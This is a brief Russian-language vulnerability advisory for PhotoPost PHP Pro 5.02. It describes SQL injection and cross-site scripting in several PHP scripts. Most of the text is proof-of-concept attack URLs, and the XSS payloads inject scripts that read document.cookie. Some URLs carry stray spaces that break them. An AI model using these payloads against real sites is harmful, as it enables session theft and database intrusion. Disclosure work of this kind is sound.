Программа: PhotoPost PHP Pro 5.02
Обнаруженные уязвимость позволяют злоумышленнику произвести XSS нападение и выполнить произвольные команды в базе данных уязвимого приложения.
SQL-инъекция возможна из-за недостаточной фильтрации входных данных в сценариях 'showmembers.php' и 'showphoto.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.
Пример:
http://[target]/photos/showmembers.php?sl='SQL_INJECTION
http://[target]/photos/showphoto.php?photo='SQL_ERROR
Межсайтовый скриптинг возможен из-за недостаточной фильтрации входных данных в сценариях 'showgallery.php', 'showmembers.php', и 'slideshow.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Примеры:
http://[target]/photos/showgallery.php?cat=%22%3E%3C
script%3Ealert(doc ument.cookie)%3C/script%3E
http://[target]/photos/showgallery.php?si=&sort=1&cat=2
& ppuser=&friendemail=%3d'email%40yourfriend.com')
this.value%3d''%3b&password=%22%3E%3 Cscript%3E
alert(document.cookie)%3C/script%3E
http://[target]/photos/showgallery.php?si=&sort=1&cat=501
& ppuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/
script%3E&fr iendemail=%3d'email%40yourfriend.com')
this.value%3d''%3b&password=
http://[target]/photos/showgallery.php?si=&sort=%22%3E%3C
script%3Ealert(document.cookie)%3C/script%3 E&cat=2&ppuser=
& friendemail=%3d'email%40yourfriend.com')
this.value%3d''%3b&password=
http://[target]/photos/showgallery.php?si=%22%3E%3C
script%3Ealert(document.cookie) %3C/script%3E
http://[target]/photos/showmembers.php?si=&sort=4&cat=500&
ppuser=%22%3E%3Cscript%3E alert(document.cookie)%3C/script%3E
http://[target]/photos/showmemb ers.php?si=&sort=%22%3E%3C
script%3Ealert(document.cookie)%3C/ script%3E&cat=500&ppuser=
http://[target]/photos/showmembers.php?si=%22%3E%3C
script%3Ealert(document.cooki e)%3C/script%3E&
sort=4&cat=500&ppuser=
http://[target]/photos/slideshow.php?photo=%22%3E%3C
script%3Ealert(document.cookie)%3C/script%3E&
amp%3bpassword=&%3bsort=1&am p%3bcat=502